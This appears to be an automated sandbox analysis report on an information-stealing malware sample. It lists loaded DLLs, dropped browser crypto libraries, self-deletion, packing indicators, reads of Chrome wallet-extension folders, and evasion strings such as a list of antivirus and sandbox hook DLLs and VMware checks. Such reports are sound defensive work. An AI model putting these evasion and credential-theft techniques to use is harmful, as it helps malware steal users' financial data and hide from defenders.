Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: freebl3.pdb source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
Source: Binary string: mozglue.pdbP source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
Source: Binary string: freebl3.pdbp source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
Source: Binary string: nss3.pdb@ source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.13.dr, softokn3.dll.13.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.13.dr, vcruntime140[1].dll.13.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.13.dr, msvcp140[1].dll.13.dr
Source: Binary string: nss3.pdb source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr
Source: Binary string: mozglue.pdb source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.13.dr, softokn3.dll.13.dr

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\21AE.exe Unpacked PE file: 5.2.21AE.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Unpacked PE file: 5.2.21AE.exe.400000.0.unpack
Source: sqls[1].dll.13.dr Static PE information: real checksum: 0x0 should be: 0x263795
Source: C9A7.exe.2.dr Static PE information: real checksum: 0x0 should be: 0x20fc0c
Source: aarhevh.2.dr Static PE information: real checksum: 0x16f83 should be: 0x14dc5
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: real checksum: 0x16f83 should be: 0x14dc5
Source: katA304.tmp.12.dr Static PE information: real checksum: 0x0 should be: 0xdfa9e
Source: sqls[1].dll.13.dr Static PE information: section name: .00cfg
Source: freebl3.dll.13.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.13.dr Static PE information: section name: .00cfg
Source: mozglue.dll.13.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.13.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.13.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.13.dr Static PE information: section name: .didat
Source: nss3.dll.13.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.13.dr Static PE information: section name: .00cfg
Source: softokn3.dll.13.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.13.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00402CD7 push cs; retf 0_2_00402CD8
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401EA7 push 0000000Eh; retf 0038h 0_2_00401EB6
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_004033B6 push eax; ret 0_2_00403419
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0216030D push ecx; ret 5_2_02160315
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042DB010 push edx; ret 12_2_042DB21F
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042DA910 push edx; ret 12_2_042DA91B
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: section name: .text entropy: 7.0432856719930195
Source: aarhevh.2.dr Static PE information: section name: .text entropy: 7.0432856719930195
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\aarhevh
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\21AE.exe
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe File created: C:\Users\user\AppData\Local\Temp\katA304.tmp
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C9A7.exe
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\aarhevh:Zone.Identifier read attributes | delete
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\aarhevh Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\21AE.exe System information queried: FirmwareTableInformation
Source: aarhevh, 00000011.00000002.4461497269.000000000060B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe, 00000000.00000002.2051697711.00000000004E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOKPF{/"
Source: aarhevh, 00000004.00000002.2290240052.00000000005E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOKX~
Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_007C32E7 rdtsc 5_2_007C32E7
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 402
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2081
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 819
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 360
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2587
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 873
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 874
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\ProgramData\GIEHIDHJDBFI\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\ProgramData\GIEHIDHJDBFI\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\ProgramData\GIEHIDHJDBFI\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll
Source: C:\Windows\explorer.exe TID: 6472 Thread sleep count: 402 > 30
Source: C:\Windows\explorer.exe TID: 7084 Thread sleep count: 2081 > 30
Source: C:\Windows\explorer.exe TID: 7084 Thread sleep time: -208100s >= -30000s
Source: C:\Windows\explorer.exe TID: 1412 Thread sleep count: 819 > 30
Source: C:\Windows\explorer.exe TID: 1412 Thread sleep time: -81900s >= -30000s
Source: C:\Windows\explorer.exe TID: 6972 Thread sleep count: 257 > 30
Source: C:\Windows\explorer.exe TID: 7152 Thread sleep count: 342 > 30
Source: C:\Windows\explorer.exe TID: 7152 Thread sleep time: -34200s >= -30000s
Source: C:\Windows\explorer.exe TID: 6596 Thread sleep count: 360 > 30
Source: C:\Windows\explorer.exe TID: 6596 Thread sleep time: -36000s >= -30000s
Source: C:\Windows\explorer.exe TID: 7084 Thread sleep count: 2587 > 30
Source: C:\Windows\explorer.exe TID: 7084 Thread sleep time: -258700s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\21AE.exe TID: 2624 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 3848 Thread sleep count: 66 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\aarhevh Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9FEBF0 PR_GetNumberOfProcessors,GetSystemInfo, 13_2_6C9FEBF0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: JEBKEH.13.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: JEBKEH.13.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2036595437.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: JEBKEH.13.dr Binary or memory string: global block list test formVMware20,11696428655
Source: 21AE.exe, 00000005.00000003.2371692498.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.000000000091E000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000997000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: JEBKEH.13.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: JEBKEH.13.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: JEBKEH.13.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: JEBKEH.13.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: JEBKEH.13.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: JEBKEH.13.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: JEBKEH.13.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2037994793.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: 21AE.exe, 00000005.00000003.2371692498.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: katA304.tmp, 0000000D.00000002.3125202827.0000000000890000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: JEBKEH.13.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: JEBKEH.13.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: katA304.tmp, 0000000D.00000002.3125202827.0000000000890000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware\Pr
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2037994793.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: JEBKEH.13.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
